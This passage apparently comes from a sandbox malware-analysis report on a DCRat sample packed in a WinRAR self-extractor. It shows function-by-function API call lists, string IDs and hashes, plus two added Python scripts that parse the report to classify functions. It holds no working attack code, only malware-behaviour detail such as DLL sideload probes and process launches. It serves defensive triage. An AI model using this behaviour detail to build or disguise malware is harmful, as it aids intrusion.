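            edges.setdefault(int(m.group(1)), []).append(int(m.group(2)))
            i += 1
        elif t.isdigit() and i + 1 < len(tokens) and ADDR.match(tokens[i + 1]):
            cur = int(t)
            blocks[cur] = {"range": tokens[i + 1], "calls": []}
            edges.setdefault(cur, [])
            i += 2
        elif cur is None:
            raise ValueError("label before first block: " + t)
        elif t == "call":
            blocks[cur]["calls"].append("call " + tokens[i + 1])
            i += 2
        elif t == "*":
            blocks[cur]["calls"][-1] += " * " + tokens[i + 1]
            i += 2
        else:
            blocks[cur]["calls"].append(t)   # a Windows API name such as FindFirstFileW
            i += 1
    return blocks, edges


def entry_blocks(blocks, edges) -> List[int]:
    """Blocks no edge points at (the function entry, normally exactly one)."""
    targets = {d for ds in edges.values() for d in ds}
    return sorted(b for b in blocks if b not in targets)


def sink_blocks(blocks, edges) -> List[int]:
    """Blocks with no successors: returns and non-returning calls such as ExitProcess."""
    return sorted(b for b in blocks if not edges.get(b))


def blocks_calling(blocks, name: str) -> List[int]:
    return sorted(b for b, info in blocks.items() if name in info["calls"])


def reachable(edges, start: int) -> set:
    seen, todo = {start}, deque([start])
    while todo:
        for nxt in edges.get(todo.popleft(), []):
            if nxt not in seen:
                seen.add(nxt)
                todo.append(nxt)
    return seen


def shortest_path(edges, start: int, goal: int) -> List[int]:
    """Breadth-first search; successors are visited in the order the dump lists them."""
    parent = {start: None}
    todo = deque([start])
    while todo:
        cur = todo.popleft()
        if cur == goal:
            path = []
            while cur is not None:
                path.append(cur)
                cur = parent[cur]
            return path[::-1]
        for nxt in edges.get(cur, []):
            if nxt not in parent:
                parent[nxt] = cur
                todo.append(nxt)
    return []


def calls_along(blocks, path: List[int]) -> List[str]:
    return [c for b in path for c in blocks[b]["calls"]]


# Constructed input: the first control-flow graph dump in this section, copied verbatim.
SAMPLE_CFG = ("control_flow_graph 1032 72a69b-72a6bf call 73ec50 1035 72a6c1-72a6ce FindFirstFileW "
              "1032->1035 1036 72a727-72a730 FindNextFileW 1032->1036 1037 72a742-72a7ff call 730602 "
              "call 72c310 call 7315da * 3 1035->1037 1039 72a6d0-72a6e2 call 72bb03 1035->1039 "
              "1036->1037 1038 72a732-72a740 GetLastError 1036->1038 1043 72a804-72a811 1037->1043 "
              "1040 72a719-72a722 1038->1040 1047 72a6e4-72a6fc FindFirstFileW 1039->1047 "
              "1048 72a6fe-72a707 GetLastError 1039->1048 1040->1043 1047->1037 1047->1048 "
              "1050 72a717 1048->1050 1051 72a709-72a70c 1048->1051 1050->1040 1051->1050 "
              "1053 72a70e-72a711 1051->1053 1053->1050 1055 72a713-72a715 1053->1055 1055->1040")

if __name__ == "__main__":
    blocks, edges = parse_cfg(SAMPLE_CFG)
    entry, = entry_blocks(blocks, edges)
    for sink in sink_blocks(blocks, edges):
        path = shortest_path(edges, entry, sink)
        print(path, calls_along(blocks, path))
```

On the sample the entry is block 1032 and the only sink is 1043; the shortest entry-to-sink path runs through the FindFirstFileW block and the three-call block 1037. Run on the longer dump above it (the function at 730863), the same search reaches the ExitProcess block 335 through the GetFileAttributesW probe blocks and the AllocConsole block 328, which is the path a triager checks when deciding whether a non-returning branch is an error exit or an evasion.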
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32), ref: 0073087C
                                                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0073088E
                                                                                              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 007308BF
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00730B69
                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00730B83
                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00730B93
                                                                                              • ReadFile.KERNEL32(00000000,?,00007FFE,|<u,00000000), ref: 00730BB1
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00730C09
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00730C1E
                                                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<u,?,00000000,?,00000800), ref: 00730C72
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,|<u,00000800,?,00000000,?,00000800), ref: 00730C9C
                                                                                              • GetFileAttributesW.KERNEL32(?,?,D=u,00000800), ref: 00730CD8
                                                                                                • Part of subcall function 0073081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00730836
                                                                                                • Part of subcall function 0073081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0072F2D8,Crypt32.dll,00000000,0072F35C,?,?,0072F33E,?,?,?), ref: 00730858
                                                                                              • _swprintf.LIBCMT ref: 00730D4A
                                                                                              • _swprintf.LIBCMT ref: 00730D96
                                                                                                • Part of subcall function 00724092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007240A5
                                                                                              • AllocConsole.KERNEL32 ref: 00730D9E
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00730DA8
                                                                                              • AttachConsole.KERNEL32(00000000), ref: 00730DAF
                                                                                              • _wcslen.LIBCMT ref: 00730DC4
                                                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00730DD5
                                                                                              • WriteConsoleW.KERNEL32(00000000), ref: 00730DDC
                                                                                              • Sleep.KERNEL32(00002710), ref: 00730DE7
                                                                                              • FreeConsole.KERNEL32 ref: 00730DED
                                                                                              • ExitProcess.KERNEL32 ref: 00730DF5
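The two large functions above carry the strings that identify this module (process 4, base 0x720000) as the WinRAR SFX extractor stub rather than the DCRat payload: the dialog function at 73b7e5 references winrarsfxmappingfile.tmp, __tmp_rar_sfx_access_check_%u, the RarSFX1 temp directory and the "-el -s2" command line, and the function at 730863 resolves SetDllDirectoryW / SetDefaultDllDirectories, probes for DXGIDebug.dll, dwmapi.dll and uxtheme.dll with GetFileAttributesW, and prints "Please remove %s from %s folder..." before ExitProcess. The script below is an added example, not part of the Joe Sandbox report: it parses the "APIs" bullet format used throughout this section and the `$`-joined "String ID" field into structured records, then labels each function from those records. The sample inputs are subsets of the bullets and String IDs of the two functions, copied from this page; the label names and the assumption that `$` is the String ID separator are mine.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Set

# One "APIs" bullet as Joe Sandbox prints it, for example:
#   • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0073088E
#   • AllocConsole.KERNEL32 ref: 00730D9E
#     • Part of subcall function 0073081B: LoadLibraryW.KERNELBASE(?,?), ref: 00730858
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str                  # module the call resolved to: KERNEL32, USER32, LIBCMT, ...
    args: List[str]              # argument column as printed; "?" means unknown to the plugin
    ref: int                     # address of the call site
    caller: Optional[int] = None   # set for "Part of subcall function X" lines


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse every API bullet in an 'APIs' section; headings and other lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw_args = m.group("args")
        args = [a for a in raw_args.split(",") if a] if raw_args is not None else []
        caller = int(m.group("caller"), 16) if m.group("caller") else None
        calls.append(ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16), caller))
    return calls


def split_string_ids(string_id_line: str) -> List[str]:
    """Assumption: the 'String ID' field joins a function's string references with '$'."""
    return [s for s in string_id_line.split("$") if s]


# Run-time strings of the WinRAR SFX stub; all of them occur in the String IDs above.
SFX_STRINGS = ("winrarsfxmappingfile.tmp", "__tmp_rar_sfx_access_check_",
               "RarSFX", "-el -s2", "STARTDLG", "LICENSEDLG")
# DLL names the stub checks for beside its own image before continuing.
SIDELOAD_DLLS = ("DXGIDebug.dll", "dwmapi.dll", "uxtheme.dll")
SEARCH_ORDER_APIS = ("SetDllDirectoryW", "SetDefaultDllDirectories")


def classify(calls: List[ApiCall], strings: List[str]) -> Set[str]:
    """Derive behaviour labels (names chosen here, not report terminology)."""
    apis = {c.api for c in calls}
    hits = set()
    if any(marker in s for s in strings for marker in SFX_STRINGS):
        hits.add("winrar_sfx_stub")
    if any(c.api == "GetProcAddress" and set(c.args) & set(SEARCH_ORDER_APIS) for c in calls):
        hits.add("dll_search_order_hardening")
    if "GetFileAttributesW" in apis and any(s in SIDELOAD_DLLS for s in strings):
        hits.add("sideload_dll_probe")
    if {"CreateFileMappingW", "MapViewOfFile", "ShellExecuteExW"} <= apis:
        hits.add("mapping_then_shellexecute")
    return hits


def triage(name: str, api_text: str, string_id_line: str) -> dict:
    calls = parse_api_lines(api_text)
    return {"function": name, "calls": len(calls),
            "modules": sorted({c.module for c in calls}),
            "labels": sorted(classify(calls, split_string_ids(string_id_line)))}


# Constructed input: subsets of the API bullets and String IDs of the two functions, copied from this report.
DLL_PROBE_APIS = """\
• GetModuleHandleW.KERNEL32(kernel32), ref: 0073087C
• GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0073088E
• GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 007308BF
• CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<u,?,00000000,?,00000800), ref: 00730C72
• GetFileAttributesW.KERNELBASE(?,?,|<u,00000800,?,00000000,?,00000800), ref: 00730C9C
  • Part of subcall function 0073081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0072F2D8,Crypt32.dll,00000000,0072F35C,?,?,0072F33E,?,?,?), ref: 00730858
• AllocConsole.KERNEL32 ref: 00730D9E
• ExitProcess.KERNEL32 ref: 00730DF5
"""
DLL_PROBE_STRINGS = ("DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done."
                     "$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll")
SFX_DIALOG_APIS = """\
• CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0073BBD0
• GetCommandLineW.KERNEL32 ref: 0073BBEA
• MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0073BC47
• ShellExecuteExW.SHELL32(0000003C), ref: 0073BC6F
• DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0073C0BD
"""
SFX_DIALOG_STRINGS = (r'-el -s2 "-d%s" "-sp%s"$C:\Users\user\AppData\Local\Temp\RarSFX1'
                      r'$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp')

if __name__ == "__main__":
    print(triage("730863 (DLL probe)", DLL_PROBE_APIS, DLL_PROBE_STRINGS))
    print(triage("73b7e5 (SFX dialog)", SFX_DIALOG_APIS, SFX_DIALOG_STRINGS))
```

The labels are deliberately conservative: each one requires both the API and the string evidence that the report actually shows, so a function that merely imports GetFileAttributesW is not tagged as a sideload probe. Applied across a whole report this separates the extractor stub's functions from those of the unpacked payload, which is where the DCRat-specific indicators (scheduled tasks, autostart keys, Telegram API use) are found.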
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                              • String ID: (=u$,<u$,@u$0?u$0Au$4Bu$8>u$D=u$DXGIDebug.dll$H?u$H@u$HAu$P>u$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=u$`@u$d?u$dAu$dwmapi.dll$h=u$h>u$kernel32$uxtheme.dll$|<u$|?u$|@u$<u$>u$?u$@u$Au
                                                                                              • API String ID: 1207345701-1434987480
                                                                                              • Opcode ID: 62b9cfc8fd23f7d095fdd5e9f35b9c716cbce943582b07c91335e25dc5599654
                                                                                              • Instruction ID: 9f8f0f58f41ba286ac0de05155314819ad34727560f3c18d7c68244d78ac29bf
                                                                                              • Opcode Fuzzy Hash: 62b9cfc8fd23f7d095fdd5e9f35b9c716cbce943582b07c91335e25dc5599654
                                                                                              • Instruction Fuzzy Hash: 56D1A6B1008384ABD3219F50C859BDFB7F8BB84746F50492DF989961A1D7FC864CCBA6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              Basic-block graph of the function starting at 73c73f (legend: Executed / Not Executed); the rendered graph is not reproduced in text, the API calls it contains are listed under APIs below.
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 0073C744
                                                                                                • Part of subcall function 0073B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0073B3FB
                                                                                                • Part of subcall function 0073AF98: _wcschr.LIBVCRUNTIME ref: 0073B033
                                                                                              • _wcslen.LIBCMT ref: 0073CA0A
                                                                                              • _wcslen.LIBCMT ref: 0073CA13
                                                                                              • SetWindowTextW.USER32(?,?), ref: 0073CA71
                                                                                              • _wcslen.LIBCMT ref: 0073CAB3
                                                                                              • _wcsrchr.LIBVCRUNTIME ref: 0073CBFB
                                                                                              • GetDlgItem.USER32(?,00000066), ref: 0073CC36
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 0073CC46
                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,0076A472), ref: 0073CC54
                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0073CC7F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
                                                                                              • String ID: %s.%d.tmp$<br>$<s$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$s
                                                                                              • API String ID: 986293930-1073329622
                                                                                              • Opcode ID: 15423c9eda76cb862de3b56580f74ef1fb0409c84fbfe36a9d4ff2aa8653699e
                                                                                              • Instruction ID: e40e13d8eb6ae6d22bb53e2ebe97b4a4424021efc913dc6c98eca459f6b86cd9
                                                                                              • Opcode Fuzzy Hash: 15423c9eda76cb862de3b56580f74ef1fb0409c84fbfe36a9d4ff2aa8653699e
                                                                                              • Instruction Fuzzy Hash: 15E167B2900218EAEF25DB64DD49EEE73BCAB04350F1080A5F649E7051EB7C9F848F61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 0072DA70
                                                                                              • _wcschr.LIBVCRUNTIME ref: 0072DA91
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0072DAAC
                                                                                                • Part of subcall function 0072C29A: _wcslen.LIBCMT ref: 0072C2A2
                                                                                                • Part of subcall function 007305DA: _wcslen.LIBCMT ref: 007305E0
                                                                                                • Part of subcall function 00731B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0072BAE9,00000000,?,?,?,000104AA), ref: 00731BA0
                                                                                              • _wcslen.LIBCMT ref: 0072DDE9
                                                                                              • __fprintf_l.LIBCMT ref: 0072DF1C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                                                              • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$9u
                                                                                              • API String ID: 557298264-2633427365
                                                                                              • Opcode ID: ff9419c86500eb6af1173b37a9b706e3d8a57c3c729fe51a29683503e04ea166
                                                                                              • Instruction ID: 18da48c45fd7e43d52ab7b3aec034183b8ff0db95df85e477d57db244e8214ef
                                                                                              • Opcode Fuzzy Hash: ff9419c86500eb6af1173b37a9b706e3d8a57c3c729fe51a29683503e04ea166
                                                                                              • Instruction Fuzzy Hash: 6632E171900228DBDF34EF68E845BEE77A5FF04300F50416AF90697291E7B99D85CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 0073B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0073B579
                                                                                                • Part of subcall function 0073B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0073B58A
                                                                                                • Part of subcall function 0073B568: IsDialogMessageW.USER32(000104AA,?), ref: 0073B59E
                                                                                                • Part of subcall function 0073B568: TranslateMessage.USER32(?), ref: 0073B5AC
                                                                                                • Part of subcall function 0073B568: DispatchMessageW.USER32(?), ref: 0073B5B6
                                                                                              • GetDlgItem.USER32(00000068,0077FCB8), ref: 0073D4E8
                                                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,0073AF07,00000001,?,?,0073B7B9,0075506C,0077FCB8,0077FCB8,00001000,00000000,00000000), ref: 0073D510
                                                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0073D51B
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,007535F4), ref: 0073D529
                                                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0073D53F
                                                                                              • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0073D559
                                                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0073D59D
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0073D5AB
                                                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0073D5BA
                                                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0073D5E1
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,007543F4), ref: 0073D5F0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                              • String ID: \
                                                                                              • API String ID: 3569833718-2967466578
                                                                                              • Opcode ID: 01802bda7270e45dcc833d630d823a4a95868bc8fe1fe530722f326c053f7754
                                                                                              • Instruction ID: b9fbe9379c3485a830858ffac9974e65971657f74c6c3bca83318dbd1a8ff926
                                                                                              • Opcode Fuzzy Hash: 01802bda7270e45dcc833d630d823a4a95868bc8fe1fe530722f326c053f7754
                                                                                              • Instruction Fuzzy Hash: 8031F571185741BFE301DF24DC4AFAB7FADEB86B04F104508F551961D1DB688A08877B
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              Basic-block graph of the function starting at 73d78f (legend: Executed / Not Executed); the rendered graph is not reproduced in text, the API calls it contains are listed under APIs below.
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 0073D7AE
                                                                                              • ShellExecuteExW.SHELL32(?), ref: 0073D8DE
                                                                                              • ShowWindow.USER32(?,00000000), ref: 0073D91D
                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 0073D959
                                                                                              • CloseHandle.KERNEL32(?), ref: 0073D97F
                                                                                              • ShowWindow.USER32(?,00000001), ref: 0073D9E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                                              • String ID: .exe$.inf$PDu<s$hs$rs
                                                                                              • API String ID: 36480843-1355383514
                                                                                              • Opcode ID: bb867f87618d10da924d9f522700f7e6057d0d07c7a0cd566c6162c6b0560b70
                                                                                              • Instruction ID: 02014bd91de949bd77be2867eede28e845855f5427e9e2b43baca96f0aae550a
                                                                                              • Opcode Fuzzy Hash: bb867f87618d10da924d9f522700f7e6057d0d07c7a0cd566c6162c6b0560b70
                                                                                              • Instruction Fuzzy Hash: CE5115704083849AFB319B24F8447AB7BE4EF41744F04481EF9C5971A2E7BDAE84CB52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              Basic-block graph of the function starting at 73a6c2 (legend: Executed / Not Executed); the rendered graph is not reproduced in text, the API calls it contains are listed under APIs below.
APIs
• FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0073B73D,00000066), ref: 0073A6D5
• SizeofResource.KERNEL32(00000000,?,?,?,0073B73D,00000066), ref: 0073A6EC
• LoadResource.KERNEL32(00000000,?,?,?,0073B73D,00000066), ref: 0073A703
• LockResource.KERNEL32(00000000,?,?,?,0073B73D,00000066), ref: 0073A712
• GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0073B73D,00000066), ref: 0073A72D
• GlobalLock.KERNEL32(00000000,?,?,?,?,?,0073B73D,00000066), ref: 0073A73E
• GlobalUnlock.KERNEL32(00000000), ref: 0073A7C6
  • Part of subcall function 0073A626: GdipAlloc.GDIPLUS(00000010), ref: 0073A62C
• GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0073A7A7
• GlobalFree.KERNEL32(00000000), ref: 0073A7CD
Strings
Memory Dump Source
• Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
• Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
Similarity
• API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
• String ID: Fjuns$PNG
• API String ID: 541704414-78378848
• Opcode ID: d8ae1a963484e62f0f4a2fba6429fa46cdab8108938f25bfd17f7b7788658cad
• Instruction ID: b9790c83e655af9c2992eb7ccce5535d8c2a56567fc3b7ae2ac967aab13bede4
• Opcode Fuzzy Hash: d8ae1a963484e62f0f4a2fba6429fa46cdab8108938f25bfd17f7b7788658cad
• Instruction Fuzzy Hash: AC31C172600B06BFE7119F31DC8DD5BBBB8EF847A1F044518F84682221EB79D8409AA5
Uniqueness
Uniqueness Score: -1.00%
Control-flow Graph
APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00745695,00745695,?,?,?,0074ABAC,00000001,00000001,2DE85006), ref: 0074A9B5
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0074ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0074AA3B
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0074AB35
• __freea.LIBCMT ref: 0074AB42
  • Part of subcall function 00748E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0074CA2C,00000000,?,00746CBE,?,00000008,?,007491E0,?,?,?), ref: 00748E38
• __freea.LIBCMT ref: 0074AB4B
• __freea.LIBCMT ref: 0074AB70
Memory Dump Source
• Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
• Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
Similarity
• API ID: ByteCharMultiWide__freea$AllocateHeap
• String ID:
• API String ID: 1414292761-0
• Opcode ID: 90c2ef7a549da190291c14d897a911173e75d935376eb08ab4688ea23e679bfa
• Instruction ID: 7f37725bf5e6a976cc39e8797b82f27c825e60fc7df7d1e590850cfb0bd01f99
• Opcode Fuzzy Hash: 90c2ef7a549da190291c14d897a911173e75d935376eb08ab4688ea23e679bfa
• Instruction Fuzzy Hash: 6251C2B2A90216BFDB258F64CC45EBFB7AAEB44750F158629FC04E6150EB7CDC40C692
Uniqueness
Uniqueness Score: -1.00%
Control-flow Graph
APIs
• FreeLibrary.KERNEL32(00000000,?,?,?,00743C35,?,?,00782088,00000000,?,00743D60,00000004,InitializeCriticalSectionEx,00756394,InitializeCriticalSectionEx,00000000), ref: 00743C03
Strings
Memory Dump Source
• Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
